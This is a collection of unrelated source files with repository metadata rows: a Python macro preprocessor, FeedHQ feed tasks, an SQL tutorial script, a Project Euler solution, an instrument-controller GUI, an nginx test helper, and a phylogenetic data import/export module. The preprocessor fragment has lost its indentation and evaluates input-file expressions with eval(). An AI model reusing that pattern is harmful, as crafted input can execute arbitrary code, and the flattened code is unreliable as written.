variable = re.compile("##\((?P<name>[a-zA-Z_][a-zA-Z0-9_]*)(?P<mods>(\.[a-z]+)+)?\)")
def _eval(expr, macros):
return eval(expr,
{'defined': lambda x: macros.has_key(x)},
macros)
def _subvar(match, macros):
name = match.group('name')
if name in macros:
val = str(macros[name])
if val is None:
return ''
else:
return ''
mods = match.group('mods')
if mods is not None:
for mod in mods[1:].split('.'):
if mod == 'lower':
val = val.lower()
elif mod == 'upper':
val = val.upper()
elif mod == 'camel':
val = ''.join(i.capitalize()
for i in val.split('_'))
return val
def process(infile = sys.stdin, outfile = sys.stdout, macros = {}):
if not isinstance(infile, file):
infile = open(infile, mode = 'r')
close_infile = True
else:
close_infile = False
if not isinstance(outfile, file):
outfile = open(outfile, mode = 'w')
close_outfile = True
else:
close_outfile = False
deepness = 0
writing_disabled = None
for line in infile:
# Skip comments
if line[0:3].lower() == '##c':
continue
# Check whether current line is a preprocessor directive
for statement in statements:
match = statement.match(line)
if match: break
if match is not None:
stmt = match.group('stmt')
if stmt == "define":
if writing_disabled is None:
key = match.group('key')
val = match.group('val')
macros[key] = val
elif stmt == "undef":
if writing_disabled is None:
key = match.group('key')
if key in macros:
del macros[key]
elif stmt == "ifdef":
deepness += 1
if writing_disabled is None and \
match.group('key') not in macros:
writing_disabled = deepness
elif stmt == "ifndef":
deepness += 1
if writing_disabled is None and \
match.group('key') in macros:
writing_disabled = deepness
elif stmt == "if":
deepness += 1
if writing_disabled is None and \
not _eval(match.group('expr'), macros):
writing_disabled = deepness
elif stmt == "elif":
if deepness == 0:
raise DeepnessException()
if writing_disabled is None and \
not _eval(match.group('expr'), macros):
writing_disabled = deepness
elif writing_disabled == deepness:
writing_disabled = None
elif stmt == "else":
if deepness == 0:
raise DeepnessException()
if writing_disabled is None:
writing_disabled = deepness
elif writing_disabled == deepness:
writing_disabled = None
elif stmt == "endif":
if deepness == 0:
raise DeepnessException()
if writing_disabled is not None and \
writing_disabled == deepness:
writing_disabled = None
deepness -= 1
# Do variable substitution in the remaining lines
elif writing_disabled is None:
outfile.write(re.sub(variable,
lambda m: _subvar(m, macros),
line))
if deepness != 0:
raise DeepnessException()
if close_infile: infile.close()
if close_outfile: outfile.close()
# ex:ts=4:et:
| gpl-2.0 | 851,380,180,004,629,900 | 32.037037 | 85 | 0.508969 | false |
feedhq/feedhq | feedhq/feeds/tasks.py | 1 | 8652 | from collections import defaultdict
from datetime import timedelta
import requests
import structlog
from django.conf import settings
from django.utils import timezone
from django_push.subscriber.models import Subscription, SubscriptionError
from rache import schedule_job
from requests.exceptions import MissingSchema
from rq.timeouts import JobTimeoutException
from .. import es
from ..profiles.models import User
from ..utils import get_redis_connection
logger = structlog.get_logger(__name__)
# TODO remove unused request_timeout
def update_feed(url, etag=None, modified=None, subscribers=1,
request_timeout=10, backoff_factor=1, error=None, link=None,
title=None, hub=None):
from .models import UniqueFeed
try:
UniqueFeed.objects.update_feed(
url, etag=etag, last_modified=modified, subscribers=subscribers,
backoff_factor=backoff_factor, previous_error=error, link=link,
title=title, hub=hub)
except JobTimeoutException:
backoff_factor = min(UniqueFeed.MAX_BACKOFF,
backoff_factor + 1)
logger.info("job timed out, backing off",
url=url, backoff_factor=backoff_factor)
schedule_job(url, schedule_in=UniqueFeed.delay(backoff_factor),
backoff_factor=backoff_factor,
connection=get_redis_connection())
except BaseException as e:
logger.info("fatal job exception", url=url, exc_info=e)
raise
def read_later(user_id, entry_pk):
user = User.objects.get(pk=user_id)
entry = es.entry(user, entry_pk, annotate_results=False)
entry.user = user
entry.read_later()
def update_favicon(feed_url, force_update=False):
from .models import Favicon
Favicon.objects.update_favicon(feed_url, force_update=force_update)
def ensure_subscribed(topic_url, hub_url):
"""Makes sure the PubSubHubbub subscription is verified"""
if settings.TESTS:
if str(type(requests.post)) != "<class 'unittest.mock.MagicMock'>":
raise ValueError("Not Mocked")
if hub_url is None:
return
log = logger.bind(topic_url=topic_url, hub_url=hub_url)
call, args = None, ()
try:
s = Subscription.objects.get(topic=topic_url, hub=hub_url)
except Subscription.DoesNotExist:
log.info("subscribing")
call = Subscription.objects.subscribe
args = topic_url, hub_url
else:
if (
not s.verified or
s.lease_expiration < timezone.now() + timedelta(days=1)
):
log.info("renewing subscription", subscription=s.pk)
call = s.subscribe
if call is not None:
try:
call(*args)
except SubscriptionError as e:
log.info("subscription error", exc_info=e)
except MissingSchema:
pass
def should_skip(date, ttl):
delta = timedelta(days=ttl)
return date + delta < timezone.now()
def store_entries(feed_url, entries):
from .models import Entry, Feed
feeds = Feed.objects.select_related('user').filter(
url=feed_url, user__is_suspended=False).values('pk', 'user_id',
'category_id',
'user__ttl')
guids = set([entry['guid'] for entry in entries])
es_query = [{'or': [{'term': {'feed': feed['pk']}} for feed in feeds]}]
# When we have dates, filter the query to avoid returning the whole dataset
date_generated = any([e.pop('date_generated') for e in entries])
if not date_generated:
earliest = min([entry['date'] for entry in entries])
limit = earliest - timedelta(days=1)
es_query.append({'range': {'timestamp': {'gt': limit}}})
filter_by_title = len(guids) == 1 and len(entries) > 1
if filter_by_title:
# All items have the same guid. Query by title instead.
titles = set([entry['title'] for entry in entries])
es_query.append({'or': [{'term': {'raw_title': t}} for t in titles]})
else:
es_query.append({'or': [{'term': {'guid': g}} for g in guids]})
existing = None
indices = []
for feed in feeds:
indices.append(es.user_alias(feed['user_id']))
if indices:
es.wait_for_yellow()
# Make sure guid and raw_title are not analyzed before querying
# anything. Otherwise existing entries are never matched and things
# keep being inserted.
mappings = es.client.indices.get_field_mapping(index=",".join(indices),
doc_type='entries',
field='guid,raw_title')
for mapping in mappings.values():
mapping = mapping['mappings']['entries']
for f in ['raw_title', 'guid']:
assert mapping[f]['mapping'][f]['index'] == 'not_analyzed'
existing_es = es.client.search(
index=",".join(indices),
doc_type='entries',
body={
'aggs': {
'existing': {
'filter': {'and': es_query},
'aggs': {
'feeds': {
'terms': {'field': 'feed', 'size': 0},
'aggs': {
'guids': {'terms': {'field': 'guid',
'size': 0}},
'titles': {'terms': {'field': 'raw_title',
'size': 0}},
},
},
},
},
},
},
)
existing_es = existing_es[
'aggregations']['existing']['feeds']['buckets']
else:
existing_es = []
existing_guids = defaultdict(set)
existing_titles = defaultdict(set)
if existing is not None:
for entry in existing:
existing_guids[entry['feed_id']].add(entry['guid'])
if filter_by_title:
existing_titles[entry['feed_id']].add(entry['title'])
existing_es_guids = defaultdict(set)
existing_es_titles = defaultdict(set)
for bucket in existing_es:
for sub in bucket['guids']['buckets']:
existing_es_guids[bucket['key']].add(sub['key'])
if filter_by_title:
for sub in bucket['titles']['buckets']:
existing_es_titles[bucket['key']].add(sub['key'])
ops = []
refresh_updates = defaultdict(list)
for feed in feeds:
seen_guids = set()
seen_titles = set()
for entry in entries:
if (
not filter_by_title and
entry['guid'] in existing_es_guids[feed['pk']]
):
continue
if (
filter_by_title and
entry['title'] in existing_es_titles[feed['pk']]
):
continue
if (
feed['user__ttl'] and
should_skip(entry['date'], feed['user__ttl'])
):
continue
if filter_by_title and entry['title'] in seen_titles:
continue
seen_titles.add(entry['title'])
if not filter_by_title and entry['guid'] in seen_guids:
continue
seen_guids.add(entry['guid'])
data = Entry(**entry).serialize()
data['category'] = feed['category_id']
data['feed'] = feed['pk']
data['_id'] = es.next_id()
data['id'] = data['_id']
data['_type'] = 'entries'
data['user'] = feed['user_id']
data['_index'] = settings.ES_INDEX
ops.append(data)
refresh_updates[feed['user_id']].append(entry['date'])
if ops:
es.bulk(ops, raise_on_error=True)
if settings.TESTS:
# Indices are refreshed asynchronously. Refresh immediately
# during tests.
indices = ",".join(set([doc['_index'] for doc in ops]))
es.client.indices.refresh(indices)
redis = get_redis_connection()
for user_id, dates in refresh_updates.items():
user = User(pk=user_id)
new_score = float(max(dates).strftime('%s'))
current_score = redis.zscore(user.last_update_key, feed_url) or 0
if new_score > current_score:
redis.zadd(user.last_update_key, feed_url, new_score)
| bsd-3-clause | -1,002,127,284,446,079,100 | 35.200837 | 79 | 0.537217 | false |
zmsch27/Python | PythonBase/Python_SQL.py | 1 | 5850 | #以下来自廖雪峰的Python学习之Python数据库
#SQLite////////////////////////////////////////////////////
#SQLite是一种嵌入式数据库,它的数据库就是一个文件。由于SQLite本身是C写的,而且体积很小
#所以,经常被集成到各种应用程序中,甚至在iOS和Android的App中都可以集成。
#Python就内置了SQLite3,所以,在Python中使用SQLite,不需要安装任何东西,直接使用。
# 导入SQLite驱动:
import sqlite3
# 连接到SQLite数据库
# 数据库文件是test.db
# 如果文件不存在,会自动在当前目录创建:
conn = sqlite3.connect('test.db')
# 创建一个Cursor:
cursor = conn.cursor()
# 执行一条SQL语句,创建user表:
cursor.execute('create table user (id varchar(20) primary key, name varchar(20))')
# 继续执行一条SQL语句,插入一条记录:
cursor.execute('insert into user (id, name) values (\'1\', \'Michael\')')
# 通过rowcount获得插入的行数:
print(cursor.rowcount)
# 关闭Cursor:
cursor.close()
# 提交事务:
conn.commit()
# 关闭Connection:
conn.close()
#我们再试试查询记录:
conn = sqlite3.connect('test.db')
cursor = conn.cursor()
# 执行查询语句:
cursor.execute('select * from user where id=?', ('1',))
# 获得查询结果集:
values = cursor.fetchall()
print(values)
cursor.close()
conn.close()
#使用Python的DB-API时,只要搞清楚Connection和Cursor对象,打开后一定记得关闭,就可以放心地使用。
#使用Cursor对象执行insert,update,delete语句时,执行结果由rowcount返回影响的行数,就可以拿到执行结果。
#使用Cursor对象执行select语句时,通过featchall()可以拿到结果集。结果集是一个list,每个元素都是一个tuple,对应一行记录。
#如果SQL语句带有参数,那么需要把参数按照位置传递给execute()方法,有几个?占位符就必须对应几个参数,例如:
#cursor.execute('select * from user where name=? and pwd=?', ('abc', 'password'))
print('-----------------------------------------\n')
#MySQL/////////////////////////////////////////////////////////////
#MySQL是Web世界中使用最广泛的数据库服务器。SQLite的特点是轻量级、可嵌入,但不能承受高并发访问,适合桌面和移动应用。
#而MySQL是为服务器端设计的数据库,能承受高并发访问,同时占用的内存也远远大于SQLite。
#此外,MySQL内部有多种数据库引擎,最常用的引擎是支持数据库事务的InnoDB。
# 导入MySQL驱动:
import mysql.connector
# 注意把password设为你的root口令:
conn = mysql.connector.connect(user='root', password='123', database='python_test')
cursor = conn.cursor()
# 创建user表:
cursor.execute('create table user (id varchar(20) primary key, name varchar(20))')
# 插入一行记录,注意MySQL的占位符是%s:
cursor.execute('insert into user (id, name) values (%s, %s)', ['1', 'Michael'])
print(cursor.rowcount)
# 提交事务:
conn.commit()
cursor.close()
# 运行查询:
cursor = conn.cursor()
cursor.execute('select * from user where id = %s', ('1',))
values = cursor.fetchall()
print(values)
# 关闭Cursor和Connection:
cursor.close()
conn.close()
print('-----------------------------------------\n')
#SQLAlchemy//////////////////////////////////////////////////////////
# 导入:
from sqlalchemy import Column, String, create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
# 创建对象的基类:
Base = declarative_base()
# 定义User对象:
class User(Base):
# 表的名字:
__tablename__ = 'user'
# 表的结构:
id = Column(String(20), primary_key=True)
name = Column(String(20))
# 初始化数据库连接:
engine = create_engine('mysql+mysqlconnector://root:123@localhost:3306/python_test')
# 创建DBSession类型:
DBSession = sessionmaker(bind=engine)
#create_engine()用来初始化数据库连接。SQLAlchemy用一个字符串表示连接信息: '数据库类型+数据库驱动名称://用户名:口令@机器地址:端口号/数据库名'
#由于有了ORM,我们向数据库表中添加一行记录,可以视为添加一个User对象:
# 创建session对象:
session = DBSession()
# 创建新User对象:
new_user = User(id='5', name='Bob')
# 添加到session:
session.add(new_user)
# 提交即保存到数据库:
session.commit()
# 关闭session:
session.close()
#可见,关键是获取session,然后把对象添加到session,最后提交并关闭。DBSession对象可视为当前数据库连接。
#如何从数据库表中查询数据呢?有了ORM,查询出来的可以不再是tuple,而是User对象。SQLAlchemy提供的查询接口如下:
# 创建Session:
session = DBSession()
# 创建Query查询,filter是where条件,最后调用one()返回唯一行,如果调用all()则返回所有行:
user = session.query(User).filter(User.id=='5').one()
# 打印类型和对象的name属性:
print('type:', type(user))
print('name:', user.name)
# 关闭Session:
session.close()
print('-----------------------------------------')
#创建表-------------------------------------------------------------------
# 导入:
from sqlalchemy import Column, String, create_engine
from sqlalchemy.ext.declarative import declarative_base
# 创建对象的基类:
Base = declarative_base()
class User(Base):
__tablename__ = 'user'
id = Column(String(20), primary_key=True)
name = Column(String(20))
class Book(Base):
__tablename__ = 'book'
id = Column(String(20), primary_key=True)
name = Column(String(20))
# “多”的一方的book表是通过外键关联到user表的:
user_id = Column(String(20))
engine = create_engine('mysql+mysqlconnector://root:123@localhost:3306/python_test')
metadata = Base.metadata
metadata.create_all(engine) | apache-2.0 | -6,221,566,883,954,505,000 | 28.697183 | 90 | 0.6824 | false |
vnbrs/project-euler | problem-13.py | 1 | 5266 | n_list = [37107287533902102798797998220837590246510135740250,
46376937677490009712648124896970078050417018260538,
74324986199524741059474233309513058123726617309629,
91942213363574161572522430563301811072406154908250,
23067588207539346171171980310421047513778063246676,
89261670696623633820136378418383684178734361726757,
28112879812849979408065481931592621691275889832738,
44274228917432520321923589422876796487670272189318,
47451445736001306439091167216856844588711603153276,
70386486105843025439939619828917593665686757934951,
62176457141856560629502157223196586755079324193331,
64906352462741904929101432445813822663347944758178,
92575867718337217661963751590579239728245598838407,
58203565325359399008402633568948830189458628227828,
80181199384826282014278194139940567587151170094390,
35398664372827112653829987240784473053190104293586,
86515506006295864861532075273371959191420517255829,
71693888707715466499115593487603532921714970056938,
54370070576826684624621495650076471787294438377604,
53282654108756828443191190634694037855217779295145,
36123272525000296071075082563815656710885258350721,
45876576172410976447339110607218265236877223636045,
17423706905851860660448207621209813287860733969412,
81142660418086830619328460811191061556940512689692,
51934325451728388641918047049293215058642563049483,
62467221648435076201727918039944693004732956340691,
15732444386908125794514089057706229429197107928209,
55037687525678773091862540744969844508330393682126,
18336384825330154686196124348767681297534375946515,
80386287592878490201521685554828717201219257766954,
78182833757993103614740356856449095527097864797581,
16726320100436897842553539920931837441497806860984,
48403098129077791799088218795327364475675590848030,
87086987551392711854517078544161852424320693150332,
59959406895756536782107074926966537676326235447210,
69793950679652694742597709739166693763042633987085,
41052684708299085211399427365734116182760315001271,
65378607361501080857009149939512557028198746004375,
35829035317434717326932123578154982629742552737307,
94953759765105305946966067683156574377167401875275,
88902802571733229619176668713819931811048770190271,
25267680276078003013678680992525463401061632866526,
36270218540497705585629946580636237993140746255962,
24074486908231174977792365466257246923322810917141,
91430288197103288597806669760892938638285025333403,
34413065578016127815921815005561868836468420090470,
23053081172816430487623791969842487255036638784583,
11487696932154902810424020138335124462181441773470,
63783299490636259666498587618221225225512486764533,
67720186971698544312419572409913959008952310058822,
95548255300263520781532296796249481641953868218774,
76085327132285723110424803456124867697064507995236,
37774242535411291684276865538926205024910326572967,
23701913275725675285653248258265463092207058596522,
29798860272258331913126375147341994889534765745501,
18495701454879288984856827726077713721403798879715,
38298203783031473527721580348144513491373226651381,
34829543829199918180278916522431027392251122869539,
40957953066405232632538044100059654939159879593635,
29746152185502371307642255121183693803580388584903,
41698116222072977186158236678424689157993532961922,
62467957194401269043877107275048102390895523597457,
23189706772547915061505504953922979530901129967519,
86188088225875314529584099251203829009407770775672,
11306739708304724483816533873502340845647058077308,
82959174767140363198008187129011875491310547126581,
97623331044818386269515456334926366572897563400500,
42846280183517070527831839425882145521227251250327,
55121603546981200581762165212827652751691296897789,
32238195734329339946437501907836945765883352399886,
75506164965184775180738168837861091527357929701337,
62177842752192623401942399639168044983993173312731,
32924185707147349566916674687634660915035914677504,
99518671430235219628894890102423325116913619626622,
73267460800591547471830798392868535206946944540724,
76841822524674417161514036427982273348055556214818,
97142617910342598647204516893989422179826088076852,
87783646182799346313767754307809363333018982642090,
10848802521674670883215120185883543223812876952786,
71329612474782464538636993009049310363619763878039,
62184073572399794223406235393808339651327408011116,
66627891981488087797941876876144230030984490851411,
60661826293682836764744779239180335110989069790714,
85786944089552990653640447425576083659976645795096,
66024396409905389607120198219976047599490197230297,
64913982680032973156037120041377903785566085089252,
16730939319872750275468906903707539413042652315011,
94809377245048795150954100921645863754710598436791,
78639167021187492431995700641917969777599028300699,
15368713711936614952811305876380278410754449733078,
40789923115535562561142322423255033685442488917353,
44889911501440648020369068063960672322193204149535,
41503128880339536053299340368006977710650566631954,
81234880673210146739058568557934581403627822703280,
82616570773948327592232845941706525094512325230608,
22918802058777319719839450180888072429661980811197,
77158542502016545090413245809786882778948721859617,
72107838435069186155435662884062257473692284509516,
20849603980134001723930671666823555245252804609722,
53503534226472524250874054075591789781264330331690]
s = 0
for i in n_list:
s += i
print(str(s)[0:10])
| mit | 6,598,877,877,318,739,000 | 48.679245 | 61 | 0.955564 | false |
Synss/pyhard2 | pyhard2/ctrlr/deltaelektronika.py | 1 | 1159 | """Graphical user interface to Delta-Elektronika SM-700 Series
controllers."""
import sys
import pyhard2.driver as drv
import pyhard2.driver.virtual as virtual
import pyhard2.driver.deltaelektronika as delta
import pyhard2.ctrlr as ctrlr
def createController():
"""Initialize controller."""
config = ctrlr.Config("deltaelektronika", "SM-700")
if not config.nodes:
config.nodes, config.names = ([1], ["SM700"])
if config.virtual:
driver = virtual.VirtualInstrument()
iface = ctrlr.virtualInstrumentController(config, driver)
else:
driver = delta.Sm700Series(drv.Serial(config.port))
iface = ctrlr.Controller(config, driver)
iface.addCommand(driver.source.voltage, "Voltage", poll=True, log=True)
iface.addCommand(driver.source.current, "Current", poll=True, log=True)
iface.populate()
return iface
def main(argv):
"""Start controller."""
from PyQt4 import QtGui
app = QtGui.QApplication(argv)
app.lastWindowClosed.connect(app.quit)
iface = createController()
iface.show()
sys.exit(app.exec_())
if __name__ == "__main__":
main(sys.argv)
| mit | 3,446,449,083,983,620,600 | 27.975 | 79 | 0.684211 | false |
jirutka/ngx-oauth | integration/support/nginx_server.py | 1 | 1260 | import os
from os import path
import shlex
from subprocess import Popen
from time import sleep
from .util import write_file
import requests
from requests import ConnectionError
from retry import retry
__all__ = ['NginxServer']
class NginxServer:
def __init__(self, nginx_conf, check_url, temp_dir='.'):
conf_path = path.join(temp_dir, 'nginx.conf')
write_file(conf_path, nginx_conf)
self._command = "nginx -c %s" % conf_path
self._ngx_process = None
self.check_url = check_url
def start(self):
self._ngx_process = Popen(shlex.split(self._command))
try: # sanity check
resp = self._request_check_url()
except ConnectionError as e:
self.stop()
raise e
if resp.status_code != 200:
raise IOError("Nginx returned %s for GET %s" % (resp.status_code, self.check_url))
def stop(self):
if self._ngx_process is None:
return
try:
self._ngx_process.terminate()
sleep(0.2)
finally:
os.kill(self._ngx_process.pid, 9)
@retry(ConnectionError, tries=20, delay=0.1)
def _request_check_url(self):
return requests.get(self.check_url, verify=False)
| mit | -6,519,647,580,464,918,000 | 25.25 | 94 | 0.603175 | false |
supertree-toolkit/stk | stk/stk_import_export.py | 1 | 22750 | #!/usr/bin/env python
#
# Supertree Toolkit. Software for managing and manipulating sources
# trees ready for supretree construction.
# Copyright (C) 2011, Jon Hill, Katie Davis
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Jon Hill. [email protected].
from StringIO import StringIO
import os
import sys
import math
import re
import numpy
from lxml import etree
import stk.nameparser.parser as np
import re
import supertree_toolkit
from copy import deepcopy
from supertree_toolkit import _parse_xml
import stk_exceptions
import stk.p4
import unicodedata
import string as python_string
def export_to_old(xml, output_dir, verbose=False, ignoreWarnings=False):
""" Create an old STK dataset from a PHYML file. Hopefuly not useful
in the long run as all functionality will be replicated, but may
be useful in the short term
"""
if not ignoreWarnings:
xml = supertree_toolkit.clean_data(xml)
# Parse the file and away we go:
xml_root = _parse_xml(xml)
# First get project name and create the directory
find = etree.XPath("//project_name")
project_name = find(xml_root)[0].xpath("string_value")[0].text
project_name.replace(' ','_')
project_dir = os.path.join(output_dir,project_name)
try:
os.mkdir(project_dir)
except OSError:
msg = "Directory already exists. "
msg += "Please check you are trying to output into the correct directory. If so remove "+project_dir
raise stk_exceptions.STKImportExportError(msg)
except:
msg = "Error making project directory: "+os.path.join(output_dir,project_name)
raise stk_exceptions.STKImportExportError(msg)
# Loop through the sources
find = etree.XPath("//source")
find_trees = etree.XPath("//source_tree")
sources = find(xml_root)
for s in sources:
# Make directory
name = s.attrib['name']
if (verbose):
print "----\nWorking on:" +name
if (name == '' or name == None):
msg = "One of the sources does not have a valid name. Aborting."
raise stk_exceptions.STKImportExportError(msg)
source_dir = os.path.join(project_dir,name)
os.mkdir(source_dir)
# for this source, grab each tree_source and create the sub-directories
tree_no = 1
if (verbose):
print "Found "+ str(len(s.xpath("source_tree"))) + " trees in this source"
for t in s.xpath("source_tree"):
tree_dir = os.path.join(source_dir,"Tree_"+str(tree_no))
os.mkdir(tree_dir)
# save the tree data
tree = t.xpath("tree/tree_string/string_value")[0].text
stk.p4.var.warnReadNoFile = False
stk.p4.var.trees = []
stk.p4.read(tree)
stk.p4.var.warnReadNoFile = True
trees = stk.p4.var.trees
stk.p4.var.trees = []
tree = trees[0].writeNewick(fName=None,toString=True).strip()
out_tree_file = open(os.path.join(tree_dir,name+"_tree_"+str(tree_no)+".tre"),"w")
out_tree_file.write('#NEXUS\nBEGIN TREES;\nTree tree_1 = [&u] ')
out_tree_file.write(tree)
out_tree_file.write("\nENDBLOCK;")
out_tree_file.close()
# create and save XML
create_xml_metadata(etree.tostring(s), etree.tostring(t), os.path.join(tree_dir,name+"_tree_"+str(tree_no)))
tree_no += 1
def import_old_data(input_dir, verbose=False):
""" Converts an old STK dataset (based on directories) to the new PHYML
file format. Note: we need XML files to get the meta data and also that
the data imported may not be complete. It's up to the calling program to save the resulting
xml string somewhere sensible.
"""
# strip trailing path separator if one
if (input_dir.endswith(os.path.sep)):
t = input_dir[0:-1]
input_dir = t
# Parse the file and away we go:
base_xml = """<?xml version='1.0' encoding='utf-8'?>
<phylo_storage>
<project_name>
<string_value lines="1"/>
</project_name>
<sources>
</sources>
<history/>
</phylo_storage>"""
xml_root = etree.fromstring(base_xml)
find = etree.XPath("//sources")
sources = find(xml_root)[0]
# add the project name from the input directory
xml_root.xpath("/phylo_storage/project_name/string_value")[0].text = os.path.basename(input_dir)
# for each XML
nXML = 0;
for xml in locate('*.xml', input_dir):
# parse XML
if (verbose):
print "Parsing: "+xml
current_xml = etree.parse(xml)
# convert into PHYML
new_source = convert_to_phyml_source(current_xml)
# This is now the source_tree portion of the XML
source_tree = convert_to_phyml_sourcetree(current_xml, xml)
# add into PHYML sources element
append_to_source, already_in = supertree_toolkit.already_in_data(new_source,sources)
if (not already_in):
# append tree to current source
new_source.append(deepcopy(source_tree))
sources.append(deepcopy(new_source)) # deepcopy otherwise it'll add the same one several times :|
else:
# we need to find the correct source and append the source_tree to this
append_to_source.append(deepcopy(source_tree))
nXML += 1
if (nXML == 0):
msg = "Didn't find any XML files in this directory"
raise stk_exceptions.STKImportExportError(msg)
# create all sourcenames
phyml = supertree_toolkit.all_sourcenames(etree.tostring(xml_root))
phyml = supertree_toolkit.set_all_tree_names(phyml)
return phyml
def locate(pattern, root=os.curdir):
"""Locate all files matching the pattern with the root dir and
all subdirectories
"""
import fnmatch
for path, dirs, files in os.walk(os.path.abspath(root)):
for filename in fnmatch.filter(files,pattern):
yield os.path.join(path, filename)
def convert_to_phyml_source(xml_root):
""" Converts old STK XML to a new STK source XML block
ready for insertion into a PHYML tree
"""
# parse XML file and extract necessary info
find = etree.XPath("//Source")
Source = find(xml_root)[0]
input_author = Source.xpath('Author')[0].text
input_title = Source.xpath('Title')[0].text
input_year = Source.xpath('Year')[0].text
input_journal = Source.xpath('Journal')[0].text
input_volume = Source.xpath('Volume')[0].text
input_pages = Source.xpath('Pages')[0].text
input_booktitle = Source.xpath('Booktitle')[0].text
input_editor = Source.xpath('Editor')[0].text
input_publisher = Source.xpath('Publisher')[0].text
author_list = []
# split the string using ',', then stich together is needed
a = input_author.lower()
if isinstance(a, unicode):
a = unicodedata.normalize('NFKD', a).encode('ascii','ignore')
author_list = a.split(' and ')
# authors_t = a.split(',')
# authors_temp = []
# if (len(authors_t) > 1):
# for a in authors_t:
# authors_temp.extend(a.split(' and '))
#
# if (len(authors_temp) > 1):
# i = 0
# while i<len(authors_temp):
# if (i+1 < len(authors_temp)):
# m = re.search('\.', authors_temp[i+1])
# if (m != None):
# # next token contains a full stop so is probably an initial
# author_list.append(str.strip(authors_temp[i+1]) + " " + str.strip(authors_temp[i]))
# i += 2
# else:
# author_list.append(authors_temp[i])
# i += 1
# else:
# author_list.append(authors_temp[i])
# i += 1
# else:
# author_list = a.split('and')
if (len(author_list) == 0):
author_list.append(input_author)
phyml_root = etree.Element("source")
publication = etree.SubElement(phyml_root,"bibliographic_information")
# does it contain a booktitle?
contains_booktitle = False
if (contains_booktitle):
article = etree.SubElement(publication,"book")
else:
article = etree.SubElement(publication,"article")
authors = etree.SubElement(article,"authors")
# now parse authors into something sensible
# authors - parse into full author names, then use nameparse to extract first and last
for a in author_list:
# further munging of name
a = a.strip()
bits = a.split(',')
if (len(bits) > 1):
a = bits[1].strip()+" "+bits[0].strip()
o = np.HumanName(a)
ae = etree.SubElement(authors,'author')
surname = etree.SubElement(ae,'surname')
string = etree.SubElement(surname,'string_value')
string.attrib['lines'] = "1"
string.text = python_string.capwords(o.last)
if (o.last.capitalize() == ''):
string.text = a
first = etree.SubElement(ae,'other_names')
string = etree.SubElement(first,'string_value')
string.attrib['lines'] = "1"
other = python_string.capwords(o.first)
string.text = other
# reset to empty if needed
if (o.first == None):
string.text = ''
# title and the publication data
title = etree.SubElement(article,"title")
string = etree.SubElement(title,"string_value")
string.attrib['lines'] = "1"
string.text = input_title
volume = etree.SubElement(article,"volume")
string = etree.SubElement(volume,"string_value")
string.attrib['lines'] = "1"
string.text = input_volume
year = etree.SubElement(article,"year")
integer = etree.SubElement(year,"integer_value")
integer.attrib['rank'] = "0"
integer.text = input_year
journal = etree.SubElement(article,"journal")
string = etree.SubElement(journal,"string_value")
string.attrib['lines'] = "1"
string.text = input_journal
pages = etree.SubElement(article,"pages")
string = etree.SubElement(pages,"string_value")
string.attrib['lines'] = "1"
string.text = input_pages
return phyml_root
def convert_to_phyml_sourcetree(input_xml, xml_file):
""" Extract the source_tree data from the old-style XML
and create an XML tree inthe new style. We leave it to the
main program to check that we append or add the source
"""
# get tree filename from current_xml
find_treefiles = etree.XPath('//TreeFile')
treefile = find_treefiles(input_xml)[0].text
# now stick on the root path of the XML to get the full path of the treefile
cur_dir = os.path.split(xml_file)[0]
try:
tree = supertree_toolkit.import_tree(os.path.join(cur_dir,treefile))
except stk_exceptions.TreeParseError as detail:
msg = "***Error: failed to parse a tree in your data set.\n"
msg += "File is: "+treefile+"\n"+detail.msg
print msg
return
except IOError:
# try just the file if we failed - windows formatted
treefile = treefile.rsplit('\\')[-1]
try:
tree = supertree_toolkit.import_tree(os.path.join(cur_dir,treefile))
except stk_exceptions.TreeParseError as detail:
msg = "***Error: failed to parse a tree in your data set.\n"
msg += "File is: "+treefile+"\n"+detail.msg
print msg
return
# all other data
find_mol = etree.XPath('//Characters/Molecular/Type')
find_morph = etree.XPath('//Characters/Morphological/Type')
find_behave = etree.XPath('//Characters/Behavioural/Type')
find_other = etree.XPath('//Characters/Other/Type')
taxa_type = input_xml.xpath('/SourceTree/Taxa')[0].attrib['fossil']
if (taxa_type == "some"):
mixed = True
allextant = False
allfossil = False
elif (taxa_type == "all"):
mixed = False
allextant = False
allfossil = True
elif (taxa_type == "none"):
mixed = False
allextant = True
allfossil = False
else:
print "Unknown taxa types in "+xml_file
print "Setting to mixed fossil and extant so you have to correct this later"
mixed = True
allextant = False
allfossil = False
# analysis
input_comments = input_xml.xpath('/SourceTree/Notes')[0].text
input_analysis = input_xml.xpath('/SourceTree/Analysis/Type')[0].text
# Theres a translation to be done here
if (input_analysis == "MP"):
input_analysis = "Maximum Parsimony"
if (input_analysis == "ML"):
input_analysis = "Maximum Likelihood"
# construct new XML
source_tree = etree.Element("source_tree")
# tree data
tree_ele = etree.SubElement(source_tree,"tree")
tree_string = etree.SubElement(tree_ele,"tree_string")
string = etree.SubElement(tree_string,"string_value")
string.attrib["lines"] = "1"
string.text = tree
# comment
if (not input_comments == None):
comment = etree.SubElement(tree_string,"comment")
comment.text = input_comments
# Figure and page number stuff
figure_legend = etree.SubElement(tree_ele,"figure_legend")
figure_legend.tail="\n "
figure_legend_string = etree.SubElement(figure_legend,"string_value")
figure_legend_string.tail="\n "
figure_legend_string.attrib['lines'] = "1"
figure_legend_string.text = "NA"
figure_number = etree.SubElement(tree_ele,"figure_number")
figure_number.tail="\n "
figure_number_string = etree.SubElement(figure_number,"string_value")
figure_number_string.tail="\n "
figure_number_string.attrib['lines'] = "1"
figure_number_string.text = "0"
page_number = etree.SubElement(tree_ele,"page_number")
page_number.tail="\n "
page_number_string = etree.SubElement(page_number,"string_value")
page_number_string.tail="\n "
page_number_string.attrib['lines'] = "1"
tree_inference = etree.SubElement(tree_ele,"tree_inference")
optimality_criterion = etree.SubElement(tree_inference,"optimality_criterion")
# analysis
optimality_criterion.attrib['name'] = input_analysis
# taxa data
taxa_data = etree.SubElement(source_tree,"taxa_data")
if (allfossil):
taxa_type = etree.SubElement(taxa_data,"all_fossil")
elif (allextant):
taxa_type = etree.SubElement(taxa_data,"all_extant")
else:
